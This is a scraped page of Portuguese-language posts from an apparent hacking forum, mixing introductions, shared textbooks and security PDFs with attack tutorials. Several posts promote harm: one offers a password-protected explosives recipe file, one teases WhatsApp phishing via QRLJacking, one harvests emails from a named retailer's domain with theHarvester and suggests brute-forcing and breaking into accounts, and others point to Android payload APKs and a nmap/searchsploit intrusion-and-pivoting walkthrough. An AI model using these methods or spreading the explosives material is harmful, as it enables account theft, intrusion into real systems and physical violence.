    Salve rapeize, tudo na paz? Ando um pouco offline, mas estes dias achei uma apostila bem legal sobre testes de invasão em redes wireless e achei que pudesse ser útil pra vocês. Pic Chamativa. Link para ver online: https://docslide.com.br/documents/teste-de-invasao-em-redes-sem-fio-80211.html O link para download está em anexo ao tópico. docslide.com.br_teste-de-invasao-em-redes-sem-fio-80211.pdf
  29. 2 points
    Podem me chamar pelo meu nick. Estou aqui para fazer amigos e permutar conhecimentos. Sou estudante de Redes de Computadores e termino este ano... Bem, vamos ser amigos? ;)
  30. 2 points
    SERVIDOR: GOOGLE DRIVE ---------------------------MATEMÁTICA--------------------------- Cálculo - James Stewart vol1. e vol.2 Com pdf das resoluções LINK:Download Curso de Cálculo - Guidorizzi vol1 Curso de Cálculo - Guidorizzi vol2 Curso de Cálculo - Guidorizzi vol3 Curso de Cálculo - Guidorizzi vol4 LINK:Download Cálculo A - Diva Fleming .Ed.6 LINK:Download Livro - Cálculo com Geometria Analítica - Leithold e soluções em pdf LINK:Download Cálculo - George Thomas vol.1 Cálculo - George Thomas vol.2 LINK:Download Livro - Introdução a Álgebra Linear - Alfredo Steinbruch e Paulo Winterle LINK:Download Livro - Álgebra Linear Boldrini LINK:Download Livro - Álgebra Linear - Alfredo Steinbruch LINK:Download Pré-Cálculo Demana LINK:Download Fundamentos de Matemática Elementar - Vol. 7 - Geometria Analítica {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Geometria Analítica - Steinbruch e Winterle {297 Exercícios propostos 82 Exercícios resolvidos} LINK:Download Fundamentos de Matemática Elementar - Vol. 5 - Combinatória e probabilidade {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Pré-Calculo Paulo Boulos LINK:Download Fundamentos de Matemática Elementar - Vol.10 - Geometria Espacial LINK:Download Fundamentos de Matemática Elementar - Vol. 9 - Geometria Plana {41 exercicios resolvidos 971 exercícios propostos com resposta 373 testes de vestibulares com resposta} LINK:Download Earl Swokowski - Cálculo com Geometria Analítica - Vol. 1 - 2ª Edição LINK:Download Calculus Made Easy Thompson LINK:Download Calculus - Spivak LINK:Download Calculo Diferencial e Integral Vol 1 - N. Piskounov LINK:Download Cálculo - Análise Matemática - Demidovitch LINK:Download Cálculo Diferencial e Integral de Funções de Várias Variáveis (Diomara Pinto e Maria Cândida F. Morgado) - 3ª edição LINK:Download Cálculo 1 para leigos LINK:Download Cálculo 2 para leigos LINK:Download Tom Apostol - Calculus vol1 e vol2 (Inglês) + Soluções LINK:Download Curso de Álgebra Linear - Fundamentos e Aplicações - Goldfeld Cabral LINK:Download Geometria analítica e Álgebra linear - Elon Lages LINK:Download Álgebra Linear e Aplicações - Callioli LINK:Download Álgebra Linear, Elon Lages Lima LINK:Download Algebra Linear - Hoffman e Kunze LINK:Download Cálculo Volume 1 e Volume 2 (Com resoluções) - Howard Anton, Irl Bivens, Stephen Davis - 8ª Edição LINK:Download Granville - Elementos do Cálculo LINK:Download Cálculo Um Curso Moderno e Suas Aplicações - Hoffmann e Bradley LINK:Download Pré-Cálculo para Leigos LINK:Download Equações Diferenciais - com Aplicações em Modelagem - Dennis G. Zill LINK:Download Equações Diferenciais Vol. 1 e Vol. 2 - Dennis G. Zill e Michael R. Cullen LINK:Download Equações Diferenciais Dennis G.Zill LINK:Download Equações Diferenciais - Coleção Schaum LINK:Download Abramo Hefez - Curso de Álgebra Vol 1 e Vol 2 LINK:Download Elementos de Álgebra - Arnaldo Garcia & Yves Lequain LINK:Download Elementos de Aritmética - Abramo Hefez LINK:Download Introdução a Teoria Dos Números - Jose Plinio de Oliveira LINK:Download Introdução a Álgebra Abstrata LINK:Download Morettin e Bussab - Estatística Básica 6ed LINK:Download Probabilidade um curso moderno com aplicações 8ed Ross LINK:Download Introdução Teoria Da Probabilidade - Hoel Port Stone LINK:Download Estatística Básica - A Arte de Trabalhar com Dados LINK:Download Geometria Analítica - Reis e Silva - Ed2 LINK:Download Geometria vol 1 e 2 Morgado LINK:Download Vetores e Geometria Analítica - Paulo Winterle LINK:Download Matemática Discreta Coleção Schaum 2ed - Seymour Lipschutz e Marc Lipson LINK:Download Análise Combinatória e Probabilidade - Morgado LINK:Download Problemas e Exercícios de Análise Matemática - Demidovitch LINK:Download Principles of Mathematical Analysis Walter Rudin (Inglês) E (Espanhol) LINK:Download Análise Real vol.1, 2 e 3 (Elon Lages Lima) Com soluções do vol.1 LINK:Download ---------------------------FÍSICA-------------------------- Curso de Física Básica - Moyses - 1ª Ed. - Vol. 1 - Mecânica Curso de Física Básica - Moyses - 4ª Ed. - Vol. 2 - Fluídos, osilações e ondas calor Curso de Física Básica - Moyses - 1ª Ed. - Vol. 3 - Eletromagnetismo Curso de Física Básica - Moyses - 1ª Ed. - Vol. 4 - Ótica, Relatividade e Física Quântica LINK:Download Física 1 - Young e Freedman - Mecânica - 12ªed Física 2 - Young e Freedman - Termodinâmica e ondas - 12ªed Física 3 - Young e Freedman -Eletromagnetismo - 12ªed Física 4 - Young e Freedman - Ótica e Física moderna - 12ªed (Com soluções) LINK:Download Fundamentos de Física 9ª Edição Vol 1 - Halliday - Mecânica Fundamentos de Física 9ª Edição Vol 2 - Halliday - Gravitação, ondas e termodinâmica Fundamentos de Física 9ª Edição Vol 3 - Halliday - Eletromagnetismo Fundamentos de Física 9ª Edição Vol 4 - Halliday - Óptica e Física moderna (Com soluções) LINK:Download Os Fundamentos da Física - Vol. 1 - - Mecânica - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 2 - - Termologia, óptica e ondas - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 3 - - Eletricidade, introdução a Física moderna e Análise dimensional - 9ªEd. RAMALHO (Com soluções) LINK:Download ópicos de Física - Mecânica - Vol 1 - Helou, Gualter e Newton Tópicos de Física - Termologia, Ondulatória e Óptica - Vol 2 - Helou, Gualter e Newton Tópicos de Física - Eletricidade, Física Moderna e Análise Dimensional - Vol 3 - Helou, Gualter e Newton (Com soluções) LINK:Download Curso de Física Vol 1, 2 e 3 - Antônio Máximo e Beatriz Alvarenga LINK:Download Lições de Física de Feynman - Vol1, 2, 3 e 4 LINK:Download
  31. 2 points
    Recomendo a documentação da linguagem, pois muitos livros PDF em pt-br estão desatualizados, a não ser que saiba inglês aí terá bastante Pode baixar a documentação em pt-br no site do PHP http://php.net/download-docs.php
  32. 2 points
    Salve rapaziada queria saber como faço para derrubar uma conexão bluetooth, por exemplo eu tenho um cara conectado em uma caixa de som bluetooth e queria desconectar ele e me conectar desde já agradeço quem ajudar .
  33. 2 points
    E ae galera gostei bastante do fórum pois esclareceu algumas dúvidas e aqui estou pra também colaborar
  34. 2 points
    Fala ae galera bombástica O arquivo com a receita para criação de explosivos, retirado da 87463ª camada da DarkWeb, está em anexo neste tópico. EU NÃO TENHO RESPONSABILIDADE ALGUMA SOBRE O QUE VOCÊ FARÁ COM ESTE CONHECIMENTO, ESTOU APENAS DIVULGANDO O MESMO, O QUE NÃO É CRIME. Divirtam-se kk Senha do arquivo: [email protected] Explosives.PDF - ipe.pdf
  35. 2 points
    Qual o procedimento pra ficar rico sem trabalhar?
  36. 2 points
    Sempre digo que um hacker de computadores tem que entender como um computador funciona. Para entender o funcionamento de um computador basicamente, estude Arquitetura e Organização de Computadores, para saber como funciona as unidades de controle, processamento, periféricos, etc... Depois, você precisa saber um pouco mais sobre o principal software que os computadores rodam, os Sistemas Operacionais, estude sobre isso também. Além disso, é importante também entender os protocolos de rede, que é como os computadores se comunicam um com os outros. Também estude isso. Isso é o essencial. Depois de aprender isso, você saberá quais os próximos passos que vc tem que dar. Não siga dicas como "aprenda kali linux" ou "aprenda a programar python". No máximo vc aprenderá a executar ferramentas prontas que não te levarão a nada.
  37. 2 points
    Salve RAQUIS de plantão. Estou entrando agora no fórum, e no ato estarei me apresentando. Me formei em ADS em 2016, mas ja estou na área de TI desde 2009, entrei por brincadeira e acabei gostando. hoje trabalho com pesquisa e testes na area de SI, evangelizador de software livre e usuário de Firefox. Quero aqui deixar minha mensagem, que no que precisar para somar com o fórum estarei a disposição.
  38. 2 points
    Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  39. 2 points
    Esses são alguns PDFs sobre engenharia social que eu li, e queria compartilhar com vocês ENGENHARIA SOCIAL O FATOR HUMANO NA SEGURANÇA DA INFORMAÇÃO. .pdf Prevenção para ataques de engenharia social.pdf Técnicas de Engenharia Social .pdf Engenharia social (segurança da informação).pdf ENGENHARIA SOCIAL O ELO MAIS FRÁGIL DA SEGURANÇA NAS EMPRESAS .pdf
  40. 2 points
    Salve hackudões de plantão. Para boa convivência de todos, devemos seguir algumas regrinhas básicas e simples para que ninguém cometa homicídio neste recinto. Regras de convivência: - Jamais ofender, xingar e/ou agredir o coleguinha; - Você é livre para postar sua opinião mas não pode impor a mesma sobre os demais. Regras para Posts: - Não postar pornografia infantil, warez, gore e qualquer outro tipo de conteúdo doente; - Não fazer spam; - Não anexar arquivos "batizados", se a administração pegar você se tornará um alvo de 20 mil pessoas. Use o conhecimento de forma sadia e aproveite a quantidade enorme de conteúdo que temos aqui. Best regards.
  41. 2 points
    Olá amigos. Trago um curso básico com total de trinta videos sobre programação em Shell. O canal da Bóson Treinamentos para quem não conhece, é uma ótimo canal de tecnologia e afins, tem muita coisa sobre programação, linux, redes, segurança e outros, se quiser dar uma olhada: Canal - Bóson Treinamentos. Voltando (kkk), deixo o link da playlist para que possam estudar. O conteúdo é bem bacana e bem explicado. Boa sorte e bons estudos. >>>>>>Shell Scripting - Playlist<<<<<<
  42. 2 points
    Apostilas de Segurança, Segurança da informação, Anonimato na internet, Firewall, Criptografia, e etc. Aula de seguranca.pdf firewall proteçãp.pdf firewall tuto basico.pdf Fundamentos de sistemas de segurança da informaçao.pdf Gestão de Segurança da Informação.pdf Tutorial como ficar invisível.pdf Técnicas Hacker soluções para segurança 1.pdf Técnicas Hacker soluções para segurança 2.pdf Sua Rede Wireless é Realmente Segura.pdf Sistema para identificar invasão.pdf Segurança Ofensiva.pdf Introdução à Segurança da Informação.pdf Manual da Segurança da Informação.pdf extensoes_seguranca_DNS.pdf
  43. 2 points
    Que tal aprender a hackear a si mesmo, antes de hackear os outros, você se controla a ponto do seu corpo obedecer? Taticas ninjas do subconsciente! Taticas ninjas do subconsciente! MANDAMENTOS PARA INTERIORIZAR AO LONGO DA VIDA # Não expressar tudo que se pensa. # Ouvir a todos, mas falar com poucos. # Ser amistoso, mas nunca ser vulgar. # Valorizar amigos testados, mas não oferecer amizade a cada um que aparecer: proteja-se de familiaridade e amizade com idiotas. # Não emprestar dinheiro a amigos, para não perder dinheiro e amigos. # Desconsiderar algo por amizade ou familiaridade é ganhar consideração para si. # Quando tiver grande consideração por alguém, esconda tal fato como um crime. O famoso "dou dinheiro mas não dou confiança". *(Eu não considero isso para familiares próximos) # Não contar a um amigo aquilo que um inimigo não pode saber. Assim, considere todos assuntos pessoais como secretos. Se os fatos mudarem, saber de algo a seu respeito, por mais inofensivo que seja, será desvantagem para você. # Evitar brigas, mas se for obrigado a entrar em uma: que seu inimigos o temam. # Jamais demostrar raiva e ódio nas ações. Os animais de sangue frio são os mais venenosos. # Usar roupas de acordo com sua renda, sem nunca ser extravagante. # Não emprestar dinheiro a amigos, para não perder dinheiro e amigos. # Seja fiel a você mesmo; e nunca será falso com ninguém. # Metade da sabedoria consiste em não amar nem odiar. Ficar calado e não crer em nada é a outra metade. DICAS DE CONVÍVIO PARA O DIA-A-DIA # Quando conhecer alguém novo, tente identificar a cor dos olhos da pessoa e, ao mesmo tempo, sorria. # Preste atenção nos pés das pessoas. Se você aborda duas pessoas no meio de uma conversa e eles virarem apenas o torso na sua direção, eles não querem que você participe da conversa. De forma similar, se você está numa conversa com alguém do trabalho ou faculdade e o torso dessa pessoa está na sua direção, mas os pés não estão, é sinal de que eles querem terminar a conversa. Saiba quando você é indesejado e não seja incoveniente. # As pessoas irão concordar em fazer algo para você mais facilmente se a dificuldade das tarefas dadas for gradual. (Comprometimento gradual faz com que as pessoas achem que gostam de você) # Ou, você pode pedir uma tarefa absurdamente difícil e receber um "não". Só para, em seguida, pedir uma tarefa bem mais fácil e fazer com que entrem em acordo com você. # Se você pedir um pequeno favor a alguém, a dissonância cognitiva vai fazê-la acreditar que se ela concordou em fazer um favor para você, ela provavelmente gosta de você. # Se você indagar alguma coisa a alguém e eles responderem parcialmente, apenas espere. Se você permanecer em silêncio e manter contato visual, é provável que a pessoa dê a informação completa. # Mastigue chiclete quando tiver que lidar com uma situação que lhe amedronta. Aparentemente, se nós estamos comendo algo nosso cerébro fica dopado. Ele racionaliza assim "Eu não estaria comendo se eu estivesse em perigo, então eu não estou em perigo". Isso pode te ajudar a se manter calmo. # Evite confusões nas calçadas com pessoas que estão indo na direção contrária a sua: projete seu caminho ao olhar intencionalmente acima de um dos ombros da pessoa que vem de encontro a você ou entre as cabeças das pessoas que vem em direção a você, se for mais que uma pessoa. A projeção do seu olhar lhes dirá por onde você vai. Eles irão abrir caminho ao escolher o lado que você não está projetando para si. # Quando você estiver estudando ou aprendendo alguma coisa nova, ensine o que você aprendeu para um conhecido. Deixe-os fazer perguntas. Se você for capaz de ensinar bem, quer dizer que você entendeu bem, além de ser um bom exercício de memorização. # Uma pessoa não vai se lembrar do que você disse , mas do que você a fez sentir. # Altere seu estado psicológico antes de uma entrevista ou reunião importante. Diga a si mesmo “Eu conheço estas pessoas por toda a minha vida. Somos velhos amigos prestes a nos reencontrar. Eu mal posso esperar para vê-los.” Tente visualizar o ato do aperto de mãos, o contato visual e a breve e leve conversa que antecede a reunião/entrevista. Que informações você não consegue esperar para dividir com eles? Mantenha uma pose que mostra abertura e sorria. Pode parecer clichê, mas você está sob o controle do seu estado psicológico e a força do estado em que você aparenta estar é grande. # Se você se mostrar feliz e excitado ao encontrar outras pessoas, elas vão reagir da mesma maneira. Nem sempre acontece na primeira vez, mas certamente acontecerá na próxima vez que você os encontrar. # Quando as pessoas estiverem com raiva de você; se você permanecer calmo elas irão ficar ainda mais raivosas, e se envergonharam disso depois. # Se você tiver um aperto de mãos caloroso com alguém que acabou de conhecer, a pessoa irá imediatamente te ver como alguém desejável de se ter por perto. # As pessoas têm imagens definidas sobe elas mesmas e vão agarrar-se a essas imagens com unhas e dentes. Use esta informação sabiamente. As pessoas podem deixar de gostar de você, caso você ataque a imagem que elas projetam para si mesmas. # Falsa atribuição de excitaçao: quando você sair com alguém pela primeira vez, leve-o a algum lugar excitante que fará seu coração disparar, como uma montanha-russa ou um filme de terror. Isso aumentará a produção de adrenalina que, por sua vez, fará com que a pessoa pense que está gostando mais da sua companhia do que da atividade em si. # A chave para a confiança é entrar numa sala e acreditar que todos presentes já gostam de você. # Os efeitos físicos do estresse (aumento do ciclo respirátorio, aceleração dos batimentos cardíacos etc.) espelham de maneira exata os efeitos físicos da coragem. Então, quando você estiver se sentindo estressado em qualquer situação imediatamente mude os termos do que você está sentindo: seu corpo está apenas se preparando para um ato de coragem, e não sentindo estresse. Isto é um exemplo de reenquadramento cognitivo; pesquisadores descobriram que você vai se sair melhor quando avaliar uma situação estressante como um desafio, e não como uma ameaça (física ou mental). # Faça referência ao nome das pessoas que você acabou de conhecer nas suas frases (sempre que possível). Isso irá estabelecer um senso de confiança e amizade imediato. # Sorria mais. Você se sentirá automaticamente mais feliz. # No momento em que o seu despertador te acordar, levante imediatamente e diga FUCK YEAH! # Sempre dê ao seu filho duas ou mais opções que o farão pensar que está no controle. Por exemplo, quando você quiser que ele coloque os tênis, pergunte "hoje você quer os tênis azuis ou os vermelhos?". # As pessoas são extremamente conscientes sobre seus sentidos do tato. Se alguém "acidentalmente" encostar os joelhos nos seus, eles podem agir como se não tivessem percebido, mas eles certamente sabem que vocês estão encostados. *Em todas as dicas que impliquem ações: faça da maneira mais orgânica e fluida possível. Você pode até ser um Sasuke frio e calculista, mas ninguém precisa saber. *Tenha em mente que a lista de mandamentos são para um norteio maior de si para si, pense bem antes de acrescentar algo novo àquela parte. Já a lista de dicas pode ser acrescida, sem problemas. *Leia os mandamentos sempre que possível: internalize-os, faça-os parte de si. *Tente praticar as dicas separadamente, em grupos de 3 ou 5 ou que for melhor para você, no seu dia-a-dia. Tentar absorver tudo ao mesmo tempo será bem difícil. espero que gostem e se quiserem encaixar mais alguma coisa , falem nos comentários vamos criar o maior manual hacker humano já visto!
  44. 2 points
    Pessoal, essa é a playlist do meu canal, que mostra comandos básicos pra quem quer dominar o terminal. Entendendo e praticando os comandos dos 5 vídeos, eu garanto a você que será capaz de navegar pelo terminal e realizar diversas ações, sozinho.
  45. 2 points
    Github https://github.com/gordonrs/thc-secure-delete
  46. 2 points
    E ae galera, tutorial de como coletar email de sites. Bom, vamos precisar de um TheHarvester Ele ja vem instalado no Kali linux, caso você não use o Kali, aqui esta o download: CLIQUE AQUI Para fazer o download de modo simples, basta clicar em "Clone or download" e logo clicar em "Download ZIP" Depois de baixar, vá até a paste de Donwload, clique com o botão direito em cima do "theHarvester-master.zip" e depois clique em "Extrair Aqui" ou "Extract Here" Uma pasta vai ser extraída "theHarvester-master" Entre nela, abra o terminal la dentro Caso o seu terminal não abra dentro da pasta, basta você digitar no terminal: cd Downloads/theHarvester-master Ok, é hora do show, veja que tem um programa chamado theHarvester.py vamos rodar ele no terminal, digite: python theHarvester.py Ok, apareceu alguns exemplos, sem enrolação vamos rodar nosso comando: python theHarvester.py -d casasbahia.com.br -b all -l 800 Vamos entender o que a gente fez: -d= domínio casasbahia.com.br = site em que quero coletar os emails -b = fonte de pesquisa (inclui o google, bing etc etc) all = quero todas as fontes de pesquisas possíveis -l = limitar o limite de resultados 800 = numero de resultados rodando esse comando, vamos ver o que ele nos retorna: Me retornou até mais que os emails hehe, host também. Ai você me pergunta, Pedro o que diabos eu vou fazer com isso? Calma jovem gafanhoto, você pode fazer muitas coisas, como: bruteforce, pode ver se esse email é utilizado em outros sites se ele tiver sendo utilizado, você pode tentar invadir aquele site, coleta de informações, veja se aquele email é vulnerável (irei fazer um tutorial). Ok galera, esse foi o tutorial, espero que vocês tenham gostado, logo logo irei mostrar como coletar emails de Facebook Usem o kali. Usem sua sabedoria. Força de vontade. E diga não as drogas.
  47. 2 points
    [align=left]Inteligência Artificial (IA) é um ramo da ciência da computação que se propõe a elaborar dispositivos que simulem a capacidade humana de raciocinar, perceber, tomar decisões e resolver problemas, enfim, a capacidade de ser inteligente.[/align] [align=left]Existente há décadas, esta área da ciência é grandemente impulsionada com o rápido desenvolvimento da informática e da computação, permitindo que novos elementos sejam rapidamente agregados à IA.[/align] História Iniciada dos anos 1940, a pesquisa em torno desta incipiente ciência eram desenvolvidas apenas para procurar encontrar novas funcionalidades para o computador, ainda em projeto. Com o advento da Segunda Guerra Mundial, surgiu também a necessidade de desenvolver a tecnologia para impulsionar a indústria bélica. Com o passar do tempo, surgem várias linhas de estudo da IA, uma delas é a biológica, que estuda o desenvolvimento de conceitos que pretendiam imitar as redes neurais humanas. Na verdade, é nos anos 60 em que esta ciência recebe a alcunha de Inteligência Artificial e os pesquisadores da linha biológica acreditavam ser possível máquinas realizarem tarefas humanas complexas, como raciocinar. Depois de um período negro, os estudos sobre redes neurais volta à tona nos anos 1980, mas é nos anos de 1990 que ela tem um grande impulso, consolidando-a verdadeiramente como a base dos estudos da IA. IA na vida real Hoje em dia, são várias as aplicações na vida real da Inteligência Artificial: jogos, programas de computador, aplicativos de segurança para sistemas informacionais, robótica (robôs auxiliares), dispositivos para reconhecimentos de escrita a mão e reconhecimento de voz, programas de diagnósticos médicos e muito mais. IA na ficção Um tema bastante recorrente em histórias de ficção científica, a Inteligência Artifical está presente em livros, desenhos animados e filmes. Um autor de grande destaque nesta área é o russo Isaac Asimov, autor de histórias de sucesso como O Homem Bicentenário e Eu, Robô. Ambas receberam adaptação para o cinema. Outra história que caiu nas graças do público foi AI: Inteligência Artificial, dirigido por Steven Spielberg. Porém, nem tudo são flores na visão daqueles que levam a IA para a ficção. Filmes como 2001: Uma Odisséia no Espaço, dirigido por Stanley Kubrick, Matrix, de Andy e Larry Wachowski, e Exterminador do Futuro, dirigido por James Cameron, mostram como a humanidade pode ser subjugada por máquinas que conseguem pensar como o ser humano e ser mais frias e indiferentes a vida do que seus semelhantes de carne e osso. A controvérsia Baseando-se em histórias fictícias como as citadas anteriormente, não é difícil imaginar o caos que poderá ser causado por seres de metal, com um enorme poder físico e de raciocínio, agindo independentemente da vontade humana. Guerras desleais, escravidão e até mesmo a extinção da humanidade estão no rol das conseqüências da IA. Por outro lado, robôs inteligentes podem ser de grande utilidade na medicina, diminuindo o número de erros médicos, na exploração de outros planetas, no resgate de pessoas soterradas por escombros, além de sistemas inteligentes para resolver cálculos e realizar pesquisas que poderão encontrar cura de doenças. Como pode ser notado, a Inteligência Artificial é um tema complexo e bastante controverso. São diversos os pontos a favor e contra e cada lado tem razão em suas afirmações. Cabe a nós esperar que, independente dos rumos que os estudos sobre IA tomem, eles sejam guiados pela ética e pelo bom senso. [align=center][/align] [align=center]FONTE - TECMUNDO[/align]
  48. 1 point
    [align=center]Olá[/align] [align=center]Primeiramente boa noite a todos, com a licença dos administradores trago para vocês algumas apostilas do meu site. com o tempo estarei postando mais conteúdo, mais por hora e isso que tenho para compartilhar espero que gostem ![/align] [align=center](Para acessar as Apostilas basta clicar no nome da apostila.)[/align] [align=center]Apostila Hackers Iniciantes[/align] [align=center]Apostila Hacker Profissional[/align] [align=center]Apostila Java [/align] [align=center]Apostila C# [/align] [align=center]Apostila Python [/align] [align=center]Apostila Firewall [/align] [align=center]Apostila Criptografia [/align] [align=center]Apostila Redes [/align] [align=center]Apostila Engenharia Social [/align] [align=center]Apostila Banco de dados [/align] [align=center]Apostila Hacker[/align] [align=center]Apostila Pentester[/align] [align=center]Livros[/align] [align=center]Abraços...[/align]
  49. 1 point
    depende do tipo de ataque, mas esses dois que iriei citar são os mais famosos: - stagefright - payload apk ambos você pode fazer por uma mesma ferramenta, metasploit. Existe outras ferramentas também, por exemplo: AhMyth. Como ja citado pelo @M4gnusX, zanti é uma boa.
  50. 1 point
    E ae galera. Hoje vamos falar sobre a insegurança em servidores locais. Imagine você hospedar um servidor local em uma maquina virtual sem nenhum firewall. Já pensou que isso é uma porta de entrada para criminosos? 1 - Levantamento de informações. Você acaba de configurar um servidor e nisso quer que outras pessoas acessem, sendo o acesso via HTTP(S) / FTP / SSH e entre outros. Você também ativa o modo bridge. Então temos: > Um servidor local hospedado em uma maquina virtual. > Protocolos rodando. > Modo bridge ativo. > Nenhum firewall. 2 - Levantamento de vulnerabilidades O levantamento de vulnerabilidades é o mais importante, é um dos métodos que o atacante pode usar para entrar no sistema. Entretanto, eu não especifiquei qual o sistema operacional que esta rodando, mas isso não interfere. No levantamento de informações o atacante pode pegar o OS por uma simples linha de comando: nmap <target> -o Pegando o sistema operacional / portas abertas, o atacante vai atrás de vulnerabilidades. Podemos procurar vulnerabilidades correspondentes com os nossos resultados de fingerprint. Em uma simples linha de comando, o atacante pode procurar varias vulnerabilidades naquele alvo. Existe uma ferramenta chamada searchsploit. No terminal, digite: searchsploit -h Vai te retornar tudo sobre ele e como usar. Eu consegui pegar a versão do FTP que estava rodando, então vou procurar alguma vulnerabilidade searchsploit ProFTPd 1.3.5 Encontramos um exploit. 3 - Invasão e mapeamento Achada a vulnerabilidade e o exploit, o atacante entra no sistema alvo. Dentro do sistema, o atacante faz o mapeamento. Principais ferramentas para isso: - Nmap - Maltego - Netdiscover. E entre outras. A primeira coisa é saber onde o sistema esta rodando, o atacante verifica se o sistema esta rodando localmente. Sabendo que o sistema esta em uma maquina virtual o atacante pode encontrar meios de entradas para o OS principal, como por exemplo, pastas compartilhadas ou até mesmo HD externos / pendrives. Agora digamos que não tem nada disso, mas tem o bridge ativo. Com o bridge ativo da pro atacante fazer muitas coisas, como por exemplo, redirecionamento de DNS (já fiz vários artigos, procure aqui no forum). Além disso, sabendo o IP padrão do modem / roteador, o atacante pode rodar o netdiscover e assim pegar outras maquinas na rede, fazendo outro scanner para achar vulnerabilidades / hosts, depois disso fazendo o pivoting.
This leaderboard is set to Sao Paulo/GMT-03:00
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.